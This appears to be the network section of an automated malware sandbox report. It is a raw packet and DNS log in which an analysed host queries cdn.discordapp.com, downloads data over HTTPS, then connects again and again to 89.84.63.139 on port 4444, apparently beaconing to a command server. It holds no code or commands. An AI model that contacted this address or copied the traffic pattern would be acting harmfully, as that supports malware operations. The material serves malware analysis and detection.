                          Dec 5, 2024 11:41:05.030500889 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.030544996 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.030725956 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.030771017 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.030777931 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.030812979 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.031249046 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.031295061 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.031830072 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.031878948 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.036484957 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.036550045 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.036642075 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.036688089 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.044473886 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.044528961 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.044617891 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.044681072 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.053447008 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.053512096 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.150374889 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.150435925 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.219744921 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.219805956 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.223301888 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.223356962 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.223522902 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.223587990 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.231165886 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.231225014 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.231389999 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.231440067 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.239063978 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.240051031 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.240063906 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.240128994 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.247133017 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.251120090 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.254888058 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.255234957 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.255244017 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.255295038 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.262763977 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.263130903 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.263138056 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.263178110 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.270700932 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.271100998 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.271110058 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.271173954 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.278562069 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.279115915 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.279128075 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.283122063 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.287328005 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.291131020 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.293412924 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.293493032 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.293572903 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.293617010 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.300520897 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.301107883 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.411475897 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.411560059 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.413764000 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.413892984 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.413934946 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.413984060 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.413992882 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.414038897 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.414074898 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.414086103 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.414247990 CET49700443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.414264917 CET44349700162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.430583000 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.430625916 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:05.430711031 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.430898905 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:05.430912971 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:06.652859926 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:06.653117895 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:06.654234886 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:06.654242039 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:06.654484987 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:06.654495955 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.128981113 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.129626036 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.129652977 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.129743099 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.129759073 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.129784107 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.129801989 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.130501032 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.131120920 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.131408930 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.131445885 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.131453037 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.131495953 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.132320881 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.132359982 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.132365942 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.132407904 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.134696007 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.134788990 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.134903908 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.135121107 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.321521044 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.322251081 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.322283983 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.322388887 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.322402000 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.322421074 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.322458982 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.322741032 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.323117971 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.323124886 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.323198080 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.329689026 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.331154108 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.331161976 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.331213951 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.339148998 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.341430902 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.346745968 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.347134113 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.347242117 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.347289085 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.355022907 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.355103016 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.355165958 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.359136105 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.362951994 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.363007069 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.363087893 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.365195990 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.369914055 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.371121883 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.377789021 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.379138947 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.379148960 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.379204988 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.385812998 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.387132883 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.387140989 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.387181044 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.393522024 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.395122051 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.395136118 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.395205021 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.401120901 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.401184082 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.408704042 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.408790112 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.512739897 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.514476061 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.514519930 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.514550924 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.514554977 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.514578104 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.514600992 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.514643908 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.516860008 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.517184973 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.525469065 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.525558949 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.533864021 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.533982038 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.538206100 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.538294077 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.542488098 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.542550087 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.550384045 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.550499916 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.558566093 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.558650970 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.562886000 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.562958956 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.571118116 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.571177959 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.579181910 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.579236031 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.587357044 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.587486029 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.591701984 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.591790915 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.635412931 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.635482073 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.707684040 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.707746983 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.709098101 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.709180117 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.710400105 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.710493088 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.716435909 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.716501951 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.722187996 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.722255945 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.727994919 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.728085041 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.731204033 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.731286049 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.736668110 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.736737967 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.739948988 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.740051985 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.745604038 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.745887041 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.751230955 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.751296997 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.757015944 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.757110119 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.760159016 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.760256052 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.764230013 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.764321089 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.767971039 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.768066883 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.770163059 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.770224094 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.774177074 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.774250031 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.777981997 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.778100967 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.780991077 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.781060934 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.784949064 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.785032988 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.787772894 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.787848949 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.896584988 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.896677017 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.898333073 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.898399115 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.899157047 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.899241924 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.900728941 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.900795937 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.902493000 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.902556896 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.903328896 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.903390884 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.903402090 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.903486967 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.903500080 CET44349701162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:07.903510094 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:07.903548956 CET49701443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:08.118427992 CET497024444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:08.238257885 CET44444970289.84.63.139192.168.2.7
                          Dec 5, 2024 11:41:08.238367081 CET497024444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:16.540436029 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:16.540467978 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:16.540610075 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:16.547693014 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:16.547708988 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:17.757827997 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:17.757997036 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:17.764847994 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:17.764867067 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:17.765109062 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:17.765176058 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:17.766555071 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:17.807342052 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:18.238167048 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:18.238240004 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:18.238272905 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:18.238297939 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:18.238308907 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:18.238368034 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:18.238882065 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:18.238950968 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:18.238959074 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:18.239082098 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:18.239716053 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:18.239808083 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:18.240633011 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:18.240717888 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:18.240830898 CET44349709162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:18.240894079 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:18.243331909 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:18.243331909 CET49709443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:24.750097036 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:24.750138998 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:24.750219107 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:24.762271881 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:24.762284994 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:25.971931934 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:25.973193884 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.031155109 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.031181097 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.031526089 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.033426046 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.062786102 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.107337952 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.462053061 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.462150097 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.462161064 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.462260008 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.462490082 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.462527990 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.462527990 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.462539911 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.462563038 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.462635994 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.463408947 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.463474989 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.463479996 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.463514090 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.470312119 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.470354080 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.470525026 CET44349735162.159.134.233192.168.2.7
                          Dec 5, 2024 11:41:26.470583916 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.475395918 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:26.475411892 CET49735443192.168.2.7162.159.134.233
                          Dec 5, 2024 11:41:30.137644053 CET44444970289.84.63.139192.168.2.7
                          Dec 5, 2024 11:41:30.137749910 CET497024444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:30.138410091 CET497464444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:30.139064074 CET497024444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:30.258167982 CET44444974689.84.63.139192.168.2.7
                          Dec 5, 2024 11:41:30.258285046 CET497464444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:30.258866072 CET44444970289.84.63.139192.168.2.7
                          Dec 5, 2024 11:41:52.187674999 CET44444974689.84.63.139192.168.2.7
                          Dec 5, 2024 11:41:52.187746048 CET497464444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:52.188213110 CET497964444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:52.188785076 CET497464444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:52.308007956 CET44444979689.84.63.139192.168.2.7
                          Dec 5, 2024 11:41:52.308106899 CET497964444192.168.2.789.84.63.139
                          Dec 5, 2024 11:41:52.308444977 CET44444974689.84.63.139192.168.2.7
                          Dec 5, 2024 11:42:14.201180935 CET44444979689.84.63.139192.168.2.7
                          Dec 5, 2024 11:42:14.201283932 CET497964444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:14.201802969 CET498474444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:14.202404976 CET497964444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:14.321573019 CET44444984789.84.63.139192.168.2.7
                          Dec 5, 2024 11:42:14.321661949 CET498474444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:14.327406883 CET44444979689.84.63.139192.168.2.7
                          Dec 5, 2024 11:42:36.217164040 CET44444984789.84.63.139192.168.2.7
                          Dec 5, 2024 11:42:36.217288971 CET498474444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:36.217761993 CET498984444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:36.218626022 CET498474444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:36.413256884 CET44444989889.84.63.139192.168.2.7
                          Dec 5, 2024 11:42:36.413274050 CET44444984789.84.63.139192.168.2.7
                          Dec 5, 2024 11:42:36.413388014 CET498984444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:58.311127901 CET44444989889.84.63.139192.168.2.7
                          Dec 5, 2024 11:42:58.311217070 CET498984444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:58.311635971 CET499494444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:58.312338114 CET498984444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:58.431488037 CET44444994989.84.63.139192.168.2.7
                          Dec 5, 2024 11:42:58.431617022 CET499494444192.168.2.789.84.63.139
                          Dec 5, 2024 11:42:58.432009935 CET44444989889.84.63.139192.168.2.7
                          Dec 5, 2024 11:43:07.739624977 CET499704444192.168.2.789.84.63.139
                          Dec 5, 2024 11:43:07.859498024 CET44444997089.84.63.139192.168.2.7
                          Dec 5, 2024 11:43:07.859571934 CET499704444192.168.2.789.84.63.139
                          TimestampSource PortDest PortSource IPDest IP
                          Dec 5, 2024 11:41:03.130563021 CET5392753192.168.2.71.1.1.1
                          Dec 5, 2024 11:41:03.270436049 CET53539271.1.1.1192.168.2.7
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Dec 5, 2024 11:41:03.130563021 CET192.168.2.71.1.1.10x7f09Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
